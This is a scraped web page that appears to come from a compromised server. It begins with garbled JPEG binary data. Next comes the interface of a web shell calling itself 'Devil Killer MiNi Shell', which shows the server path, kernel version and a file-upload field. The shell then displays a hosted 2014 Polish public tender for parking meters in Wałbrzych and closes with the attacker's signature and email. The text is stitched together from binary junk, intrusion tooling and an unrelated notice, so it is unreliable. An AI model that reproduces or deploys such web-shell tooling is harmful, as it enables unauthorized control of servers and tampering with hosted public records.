JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140408/120002-N-2014.html

<p class="kh_header"><b>Wałbrzych: Wyposażenie Placów Parkingowych w Wałbrzychu w urządzenia parkingowe (parkomaty) oraz w komputerowe centrum przetwarzania danych wraz z ich obsługą i utrzymaniem</b><br>
<b>Numer ogłoszenia: 120002 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych - Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu , ul. Matejki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 74 6414400, 6414408, faks 74 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdkium.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie Placów Parkingowych w Wałbrzychu w urządzenia parkingowe (parkomaty) oraz w komputerowe centrum przetwarzania danych wraz z ich obsługą i utrzymaniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest uruchomienie 5 nowych parkomatów (wyprodukowanych nie wcześniej niż w 2013 r. ) wraz z szyldami informacyjnymi o treści Zakup biletów w parkomacie na placach parkingowych (PP) w Wałbrzychu (wg zestawienia tabelarycznego stanowiącego załącznik A do SIWZ) oraz w komputerowe centrum przetwarzania danych wraz z ich obsługą i utrzymaniem.
Zakres zamówienia obejmuje:
1. Sporządzenie wykazu urządzeń do pobierania i rozliczania opłat parkingowych oraz ich lokalizacja z zastrzeżeniem, iż Wykonawca niniejszego zamówienia zobowiązany jest do uzyskania wszelkich niezbędnych uzgodnień i pozwoleń na lokalizację i kolorystykę parkometrów, w tym także pozwolenia właściwego konserwatora zabytków, oraz pozostałych urządzeń niezbędnych do zorganizowania i właściwego funkcjonowania PlacówParkingowych.
2. Wyposażenie PP (zamontowanie i uruchomienie) w parkometry w ilości 5 sztuk, 
nowych urządzeń jednego typu zgodnie z zatwierdzonym projektem lokalizacji parkometrów oraz ich skonfigurowanie i zatwierdzenie. W przypadku, jeżeli w trakcie realizacji zamówienia w ramach polityki transportowej miasta Wałbrzycha będzie wprowadzona zmiana związana z Placami Parkingowymi wyłączająca ruch pojazdów samochodowych, Zamawiający zastrzega sobie prawo zmiany lokalizacji parkometrów.
3. Zorganizowanie komputerowego Centrum Przetwarzania Danych (CPD) kontrolującego (monitorującego) funkcjonowanie PP.
4. Wykonanie oznakowania pionowego na PP wg. projektu organizacji ruchu będącego załącznikiem B do SIWZ oraz wykonanie i montaż 4 tablic z regulaminem parkingu przed wjazdem na PP wg treści będącej  w załączniku C.
5. Wyposażenie Zamawiającego w urządzenie do kontroli wnoszenia opłat (terminal mobilny) w ilości 1 sztuki wraz z oprogramowaniem do sprawowania nadzoru i windykacji opłat dodatkowych wystawianych dla użytkowników miejsc parkingowych, którzy nie uiścili opłaty za postój, w oparciu o Kodeks Postępowania Cywilnego. 
6. Przeszkolenie pracowników Zamawiającego w zakresie obsługi dostarczonego sprzętu i oprogramowania.
7. Bieżąca obsługa, naprawy oraz konserwacje urządzeń parkingowych (parkometrów)
i komputerowego Centrum Przetwarzania Danych. 
8. Naprawy, dostarczanie materiałów eksploatacyjnych oraz konserwacja urządzeń, o których mowa w pkt 2 i pkt.5.
9. Zagwarantowanie na własny koszt i ryzyko kompleksowej usługi polegającej na transporcie gotówki, przeliczeniu wartości pieniężnych oraz przekazaniu ich na rachunek bankowy Zamawiającego. Wpływy z parkometrów winny być wpłacone na rachunek bankowy Zamawiającego w okresie jednego tygodnia od chwili ich pobrania. Rozliczenie całości wpływów nastąpi po zakończeniu miesiąca.
10. Utrzymanie czystości Placów Parkingowych, w tym oznaczonych miejsc dla osób niepełnosprawnych w obszarze PP, prowadzone przez cały rok z rozróżnieniem okresu letniego i okresu zimowego. Za okres letni uważa się okres od 16 kwietnia do 31 października. Pozostały okres traktowany jest jako okres zimowy. Wykonawca zobowiązany jest do utrzymywania czystości miejsc parkingowych w ciągu całego okresu umownego, niezależnie od jego formalnego podziału na okresy letnie i zimowe od poniedziałku do soboty.
1) Zakres prac w okresie letnim obejmuje: codzienne sprzątanie opadłych liści, ręczne zbieranie drobnych nieczystości, ręczne lub mechaniczne zamiatanie Placów Parkingowych.
2)  Zakres prac w okresie zimowym obejmuje: odśnieżanie i usuwanie nadmiaru śniegu oraz śliskości, które należy rozpocząć niezwłocznie po ustąpieniu opadów śniegu lub innych zjawisk pogodowych powodujących śliskość. Dopuszcza się występowanie luźnego śniegu do 6 godzin po zakończeniu funkcjonowania PP. W trakcie długotrwałego opadu śniegu prace te należy prowadzić na bieżąco, tak aby nie dopuścić do zalegania zasp śnieżnych. Śnieg usunięty z PP należy spryzmować w miejscu nie utrudniającym komunikacji pieszych i pojazdów. Wykonawca zobowiązany jest do spryzmowania śniegu i maksymalnie w ciągu 2 dni do jego wywiezienia. W czasie intensywnych opadów śniegu Zamawiający będzie indywidualnie uzgadniał zasady wywozu spryzmowanego śniegu z obszaru PP. Do posypywania parkingów i chodników należy stosować wyłącznie piasek. Doczyszczenie pozimowe z piasku należy wykonać nie później niż do końca kwietnia. W przypadku wystąpienia dni bez śniegu należy wykonywać prace jak w okresie letnim. 
Prace wymienione w pkt 1) i 2) winny być wykonane w taki sposób, aby gwarantowały bezpieczny dostęp do parkometrów i miejsc parkingowych.
Czynności dotyczące utrzymania miejsc parkingowych w obszarze PP w czystości w okresie letnim i zimowym muszą być wykonywane z wyprzedzeniem przed godzinami rozpoczęcia funkcjonowania miejsc postojowych. W celu utrzymania czystości na PP, sprzątanie należy zakończyć w sobotę po zakończeniu funkcjonowania PP do godz. 24:00.
Urządzenia, o których mowa w pkt. 4.2 oraz 4.5 muszą być, w okresie realizacji umowy, własnością Wykonawcy lub być we władaniu Wykonawcy na podstawie tytułu prawnego. 
Przed podpisaniem umowy Wykonawca zobowiązany będzie przedstawić dokumenty dot. urządzeń (faktury, umowy najmu, leasingu, dokument potwierdzający rok produkcji, itp.)
w celu sprawdzenia ich zgodności z wymogami określonymi w SIWZ. Z przeprowadzonych czynności sprawdzających strony sporządzą protokół, który podpiszą uprawnieni przedstawiciele Zamawiającego i Wykonawcy. 
Zamawiający przekaże Wykonawcy obszar PP w terminie 3 dni roboczych od daty podpisania umowy. 
W terminie 14 dni po upływie okresu ważności umowy urządzenia, o których mowa
w pkt. 4.2 zostaną zdemontowane przez Wykonawcę, na jego koszt, wraz  z odtworzeniem nawierzchni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.73.00.00-1, 63.71.24.00-7, 51.21.40.00-5, 51.61.00.00-1, 30.20.00.00-1, 64.21.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 25.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował, a w przypadku świadczeń okresowych lub ciągłych również realizuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienie polegające na zorganizowaniu i prowadzeniu płatnych miejsc postojowych na placach parkingowych o liczbie miejsc parkingowych nie mniejszej niż 150 lub liczbie obsługujących parkometrów nie mniejszej niż 3 szt., trwające przez okres ciągły minimum 12 miesięcy
Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub ma możliwość dysponowania 5 nowymi urządzeniami parkingowymi (rok produkcji - nie wcześniej niż 2013 r.) oraz 1 szt. terminala mobilnego wraz z oprogramowaniem niezbędnymi do realizacji zamówienia. 
Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie, o którym mowa powyżej Wykonawca zobowiązany jest wykazać że zrealizował, a w przypadku świadczeń okresowych lub ciągłych również realizuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienie polegające na zorganizowaniu i prowadzeniu płatnych miejsc postojowych na placach parkingowych o liczbie miejsc parkingowych nie mniejszej niż 150 lub liczbie obsługujących parkometrów nie mniejszej niż 3 szt., trwające przez okres ciągły minimum 12 miesięcy wraz z podaniem ich wartości, przedmiotu, daty wykonania, podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) do przedstawienia oryginałów lub potwierdzonych przez Wykonawcę za zgodność z oryginałem kserokopii dokumentów potwierdzających prawo dysponowania parkometrami i terminalami mobilnymi na czas realizacji zamówienia, 
b) przedstawić opłacone dokumenty ubezpieczeniowe (polisy + dowody opłacenia), potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 150 000,00 zł., zawarte na czas realizacji umowy zgodnie z zapisami § 17 umowy,
c) wnieść zabezpieczenie należytego wykonania umowy zgodnie z zapisami pkt 19      Specyfikacji Istotnych Warunków Zamówienia,
d) w przypadku podmiotów występujących wspólnie do przedłożenia umowy konsorcjum,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza ewentualną zmianę następujących istotnych postanowień umownych:
a) zakresu przedmiotu umowy oraz sposobu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, np. zaistnienie warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy, 
b) terminu realizacji umowy - wskutek wystąpienia okoliczności niezależnych od stron umowy,
c) osób wymienionych w ofercie Wykonawcy pod warunkiem wyrażenia zgody przez Zamawiającego, oraz że osoby te będą spełniały warunki opisane w Specyfikacji,
d) innych postanowień umownych w zakresie wynikającym z uregulowań prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy,
e) innych - mogących mieć wpływ na niezakończenie przedmiotu umowy z przyczyn niezależnych od stron
f) w przypadkach określonych we wzorze umowy stanowiącym do SIWZ,
g)  zmiany albo rezygnacji z podwykonawcy w zakresie podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy. Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
h) powierzenia części zamówienia podwykonawcy w trakcie realizacji umowy, jeżeli Wykonawca nie zakładał wykonania zamówienia przy pomocy podwykonawcy, podwykonawców  w trakcie składania ofert.
2. Zmiana umowy wymaga formy pisemnej. 
3. Strona występująca ze zmianą zobowiązana będzie wystąpić na piśmie do drugiej strony z informacją o zakresie zmiany, jej podstawie i jeżeli jest to konieczne zobowiązana będzie przedstawić odpowiednie dokumenty potwierdzające konieczność wprowadzenia zmian. Strona która otrzyma wniosek, zobowiązana jest przedstawić swoje stanowisko na piśmie w terminie 7 dni od dnia otrzymania wniosku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdkium.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wałbrzych - Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu
58-300 Wałbrzych, ul. J. Matejki 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2014 godzina 11:00, miejsce: Gmina Wałbrzych - Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu, 
58-300 Wałbrzych ul. J. Matejki 1, w sekretariacie, pokój nr 37.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com